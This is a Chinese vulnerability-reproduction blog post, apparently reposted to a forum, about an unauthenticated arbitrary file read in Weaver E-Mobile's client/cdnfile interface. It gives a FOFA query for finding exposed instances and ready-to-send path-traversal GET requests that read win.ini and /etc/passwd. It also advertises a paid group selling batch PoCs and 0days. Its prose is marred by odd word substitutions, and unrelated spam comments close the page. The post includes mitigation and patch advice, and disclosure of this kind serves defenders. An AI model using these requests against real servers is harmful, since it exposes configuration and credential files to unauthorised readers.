「漏洞复现」泛微E-Mobile client/cdnfile 任意文件读取漏洞
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_gif/rPMtsalfZ0pFeDPJNnYaE7pYibBLQrUbLZwqelcotCqhYf0seBKfHroSUm8XuHyka5I3SmicWcJYUpZbFmxJCZ1Q/640?wx_fmt=gif&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x01 免责声明</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">免责声明</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">请勿利用<span style="color: black;">文案</span>内的<span style="color: black;">关联</span>技术从事<span style="color: black;">违法</span>测试,<span style="color: black;">因为</span>传播、利用此文所<span style="color: black;">供给</span>的信息而<span style="color: black;">导致</span>的任何直接<span style="color: black;">或</span>间接的后果及损失,均由<span style="color: black;">运用</span>者<span style="color: black;">自己</span>负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。<span style="color: black;">这次</span>测试仅供学习<span style="color: black;">运用</span>,如若<span style="color: black;">违法</span>他用,与平台和本文作者无关,需<span style="color: black;">自动</span>负责!!!</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x02</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">制品</span>介绍</strong></p>泛微E-Mobile是一款由泛微网络科技股份有限<span style="color: black;">机构</span><span style="color: black;">研发</span>的移动办公<span style="color: black;">制品</span>,该<span style="color: black;">制品</span>专门为手机、平板电脑等移动终端用户设计,旨在<span style="color: black;">供给</span><span style="color: black;">方便</span>、<span style="color: black;">有效</span>的移动办公体验。适用于企业高管和有移动办公<span style="color: black;">需要</span>的业务部<span style="color: black;">关联</span>员工<span style="color: black;">运用</span>,<span style="color: black;">尤其</span>适合于已有内部OA系统的大中型企业<span style="color: black;">公司</span>,尤其是企业或<span style="color: black;">分部</span>有较多的分支<span style="color: black;">公司</span>。近期推出的鸿蒙原生应用基线版本就实现了跨设备联动、应用接续等创新功能,为用户带来更加<span style="color: black;">有效</span>、<span style="color: black;">方便</span>的移动办公体验。<span style="color: black;">将来</span>,泛微E-Mobile将继续引领数字化办公浪潮,为<span style="color: black;">更加多</span>企业<span style="color: black;">供给</span><span style="color: black;">优秀</span>的移动办公<span style="color: black;">处理</span><span style="color: black;">方法</span>。<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x03</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">漏洞威胁</strong></p>泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞,未经身份验证攻击者可<span style="color: black;">经过</span>该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,<span style="color: black;">引起</span>网站<span style="color: black;">处在</span>极度不安全状态。<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x04</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">漏洞环境</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">FOFA:</span></p><span style="color: black;"><span style="color: black;">app</span>=<span style="color: black;">"泛微-EMobile"</span></span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ohnxlTcKK6kzHugnFx562BGPZyricNGWEibyLWYgP9kxnC8X8lCQAibF2fSuekl2FJyexj5562nYBUQ/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x05</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">漏洞复现</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows-PoC</p><span style="color: black;"><span style="color: black;">GET</span> <span style="color: black;">/client/cdnfile/1C/Windows/win.ini?windows</span> HTTP/1.1</span><span style="color: black;"><span style="color: black;">Host</span>: </span><span style="color: black;"><span style="color: black;">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0</span><span style="color: black;"><span style="color: black;">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><span style="color: black;"><span style="color: black;">Accept-Encoding</span>: gzip, deflate</span><span style="color: black;"><span style="color: black;">Accept-Language</span>: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><span style="color: black;"><span style="color: black;">Connection</span>: close</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ohnxlTcKK6kzHugnFx562BJBmHk5QjfPb9fLqTrXib12ycAvXDo6SOC4ibAmaR7bNLk6sgTevEyEKg/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Linux-PoC</p><span style="color: black;"><span style="color: black;">GET</span> <span style="color: black;">/client/cdnfile/C/etc/passwd?linux</span> HTTP/1.1</span><span style="color: black;"><span style="color: black;">Host</span>: </span><span style="color: black;"><span style="color: black;">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0</span><span style="color: black;"><span style="color: black;">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><span style="color: black;"><span style="color: black;">Accept-Encoding</span>: gzip, deflate</span><span style="color: black;"><span style="color: black;">Accept-Language</span>: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><span style="color: black;"><span style="color: black;">Connection</span>: close</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ohnxlTcKK6kzHugnFx562B5SZmLkW7VvtafsM5Z3410D5iczmibGDRHJhyl2KLGkfBWuiaInJgDSrNA/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x06</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">批量脚本验证</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Nuclei验证脚本已发布</p><span style="color: black;">知识星球:冷漠安全</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ohnxlTcKK6kzHugnFx562BTmv7GibGuBpricxOsoTkRKNEQY0QYUbibwmTmuFSIgss6lflUmuysr4Wg/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x07</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">修复<span style="color: black;">意见</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">临时缓解<span style="color: black;">方法</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">接口设置<span style="color: black;">拜访</span>权限或限制<span style="color: black;">拜访</span>来源<span style="color: black;">位置</span>,如非必要,不要将系统开放在互联网上。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">升级修复<span style="color: black;">方法</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">日前</span>官方已发布安全补丁,<span style="color: black;">意见</span>受影响用户尽快升级至安全版本</p><span style="color: black;">https:<span style="color: black;">//www.weaver.com.cn/</span></span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x08</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">加入<span style="color: black;">咱们</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">漏洞详情及批量检测POC工具请前往知识星球获取</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">知识星球:冷漠安全</p>交个<span style="color: black;">伴侣</span>,限时优惠券:加入立减25
星球福利:<span style="color: black;">每日</span>更新最新漏洞POC、资料文献、内部工具等<img src="https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ohnxlTcKK6kzHugnFx562BJJkUglibB7icHxee4L88MdpASZMcuvUf2oH9RTrENzIYkqXlfvqgic9Xg/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">「星球介绍」:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">本星球<span style="color: black;">保持</span><span style="color: black;">每日</span>分享<span style="color: black;">有些</span>攻防知识,<span style="color: black;">包含</span>攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、<span style="color: black;">处理</span><span style="color: black;">方法</span>、安全运营、安全体系、安全培训和安全标准等文库。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">本星主已加入几十余个付费星球,<span style="color: black;">定时</span>汇聚高质量资料及工具进行星球分享。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">「星球服务」:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">加入星球,你会<span style="color: black;">得到</span>:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">♦ 批量验证漏洞POC脚本</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">♦ 0day、1day分享</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">♦ 汇集其它付费星球资源分享</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">♦ <span style="color: black;">海量</span>的红蓝对抗实战资源</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">♦ 优秀的内部红蓝工具及插件</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">♦ 综合类别优秀Wiki文库及漏洞库</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">♦ 提问及技术交流</p><img src="https://mmbiz.qpic.cn/sz_mmbiz_gif/rPMtsalfZ0ohnxlTcKK6kzHugnFx562BjgbjaFAVYsQXExhqn2KaA2NFoTVQMkuxcWJLN0CWbN3w4icnnicKdsKw/640?wx_fmt=gif&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
你的见解真是独到,让我受益良多。 你的话语真是温暖如春,让我心生感激。 交流如星光璀璨,点亮思想夜空。 论坛的成果是显著的,但我们不能因为成绩而沾沾自喜。
页:
[1]